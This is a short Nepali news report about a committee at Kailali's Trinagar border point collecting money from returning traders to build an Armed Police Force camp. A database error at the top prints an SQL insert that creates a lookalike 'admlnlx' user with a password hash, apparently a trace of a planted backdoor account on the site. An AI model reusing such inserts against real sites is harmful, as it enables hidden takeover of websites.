WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDAwp8VjC7U2B3UVH7Nn9PeEr63eUQ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 14:11:52', '', 'admlnlx', 'admlnlx')
कैलाली,फागुन १ –
कैलालीको त्रिनगर सीमा नाकामा सशस्त्र प्रहरीको बेस क्याम्पको भवन निर्माण गर्न उपभोक्ता समितिले भारतबाट नेपाल फर्किरहेका व्यापारीबाट रकम असुलिरहेका छन् ।
सशस्त्र प्रहरीको बेस क्याम्प भवनको निर्माणका लागि रु २० लाख लाग्ने भन्दै समितिले नेपाली व्यापारीबाट रु १०० र रु ५० को रसिद दिएर रकम असुली गरिरहेको नेपाली व्यापारीले गुनासो गरेका छन् ।
नेपालीलाई आवतजावतमा सहज होस् भन्नाका लागि नै सशस्त्र प्रहरीको बेस क्याम्प राख्न स्थानीयवासीको सक्रियतामा निर्माण समिति गठन गरिएको र उक्त समितिको निर्णयअनुसार नै रसिद दिएर रकम लिइरहेको उपभोक्ता समितिले जनाएको छ ।
सशस्त्र प्रहरीका प्रहरी निरीक्षक सुरज बस्नेतले भने स्थानीयवासीको सक्रियतामा क्याम्प निर्माण हुने र निर्माण सम्पन्न भएपछि मात्रै सशस्त्र प्रहरीलाई हस्तान्तरण हुने भएकाले रकम असुलीमा सशस्त्र प्रहरीको कुनै संलग्नता नरहेको जानकारी दिनुभएको छ । – रासस